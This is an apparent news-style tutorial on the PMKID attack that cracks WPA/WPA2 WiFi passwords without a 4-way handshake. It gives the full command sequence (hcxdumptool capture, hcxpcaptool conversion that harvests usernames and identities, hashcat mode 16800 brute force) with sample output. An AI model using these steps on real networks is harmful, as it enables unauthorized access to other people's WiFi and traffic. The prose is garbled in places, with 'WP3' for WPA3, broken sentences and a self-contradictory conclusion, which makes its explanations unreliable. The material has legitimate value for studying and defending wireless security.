The new WPA / WPA2 cracking method has enabled WiFi networks that allow attackers to access pre-shared key hash that used to crack target victims ‘ passwords.
This method was discovered during the attack against the recently released WPA3 security standard, which is extremely difficult to crack since the modern key establishment protocol Simultaneous Authentication of Equals (SAE) was used.
New WP3 security standard released by the Wi – Fi Alliance, which provides Wi – Fi security for the next generation with new capabilities to enhance both personal and enterprise networks and the new WP3 security standard, which is a successor to WPA2.
This attack is found by the researcher to compromise the WPA / WPA2 password without an EAPOL 4-way handshake. According to Steube, the developer of the Hashcat password cracking tool, the new attack is carried out on the RSN IE of a single EAPOL frame.
This attack also works against all 802.11i / p / q / r roaming networks, and it is not clear how many vendors and routers this technique will work.
How does this WPA / WPA2 WiFi Password Attack Works
Robust Security Network Information Element (RSN IE) works in 802.11 management frames and in a single EAPOL framework.
When the user attempts to authenticate with the router, the Pairwise Master Key ID (PMKID) can be captured from the RSN IE. ” We can see here that the PMKID is captured using HMAC-SHA1 where the key is the PMK and the data part is the concatenation of the fixed string label ” PMK Name, ” the MAC address of the access point and the MAC address of the station.”
To use this new attack, the following tools are required:
1. hcxdumptool V4.2.0 or higher
2. hcxtools V4.2.0 or higher
3. Hashcat v4.2.0 or higher
First Run hcxdumptool to retrieve the AP PMKID and dump the PCAP file using the following code.
$./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable status
The output looks like this:
Start capturing (stop with ctrl+c)
FILTERLIST……………: 0 entries
MAC CLIENT……………: 89acf0e761f4 (client)
MAC ACCESS POINT………: 4604ba734d4e (start NIC)
EAPOL TIMEOUT…………: 20000
10 beacons GIVE UP DEAUTHENTICATIONS: 20 tries
Run next tool called hcxpcaptool to convert the captured data from pcapng format to a hash format accepted by hashcat using following code.
The file content will look like this and it will be divided into four columns.
PMKID* MAC AP* MAC Station* ESSID
It is also recommended that options
-E retrieve possible passwords from WiFi-traffic (additional, this list will include ESSIDs)
-I retrieve identities from WiFi-traffic
-U retrieve usernames from WiFi-traffic
$ ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng
Finally, run hashcat to crack it, we must use the PMKID-16800 hash mode and we can use this hash as any other hash type.
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’
Finally, it cracked the hash WPA-PMKID-PBKDF2
In order to gain access to the PMKID, this new attack simply has to try to authenticate the wireless network later.
This method is also much easier to access the hash containing the pre-shared key and the hash will be cracked later, although this attack is not very complex due to the complexity of the password.